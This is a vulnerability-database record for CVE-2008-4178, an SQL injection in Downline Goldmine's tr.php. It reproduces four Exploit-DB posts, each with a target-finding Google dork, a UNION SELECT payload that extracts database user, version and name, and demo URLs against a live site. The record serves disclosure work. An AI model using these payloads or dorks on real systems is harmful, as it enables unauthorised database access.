CVE-2008-4178
Published 2008-09-23
Priority P3 · 45 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 3.38% (87.3th percentile)
SQL injection vulnerability in tr.php in DownlineGoldmine Special Category Addon, Downline Builder Pro, New Addon, and Downline Goldmine Builder allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| downline_goldmine | builder | — | — |
| downline_goldmine | builder | — | — |
| downline_goldmine | new_addon | — | — |
No detection rules found.
Exploit-DB
Downline Goldmine paidversion - SQL Injection
exploitdb·2008-11-02
---
paidversion (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/paidversion/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my friend
# milw0rm.com [2008-11-02]
Exploit-DB
Downline Goldmine newdownlinebuilder - SQL Injection
exploitdb·2008-11-02
---
newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my friend
# milw0rm.com [2008-11-02]
Exploit-DB
Downline Goldmine Category Addon - SQL Injection
exploitdb·2008-11-01
---
Category Addon (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my friend
# milw0rm.com [2008-11-01]
Exploit-DB
Downline Goldmine Builder - SQL Injection
exploitdb·2008-11-01
---
Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my friend
# milw0rm.com [2008-11-01]
No writeups or analysis indexed.
http://packetstorm.linuxsecurity.com/0809-exploits/categoryaddon-sql.txt
http://packetstorm.linuxsecurity.com/0809-exploits/downline-sql.txt
http://packetstormsecurity.org/0809-exploits/newdownline-sql.txt
http://secunia.com/advisories/31812
http://www.securityfocus.com/bid/31169
http://www.vupen.com/english/advisories/2008/2992
http://www.vupen.com/english/advisories/2008/2993
http://www.vupen.com/english/advisories/2008/2994
http://www.vupen.com/english/advisories/2008/2995
https://exchange.xforce.ibmcloud.com/vulnerabilities/45128
https://www.exploit-db.com/exploits/6946
https://www.exploit-db.com/exploits/6947
https://www.exploit-db.com/exploits/6950
https://www.exploit-db.com/exploits/6951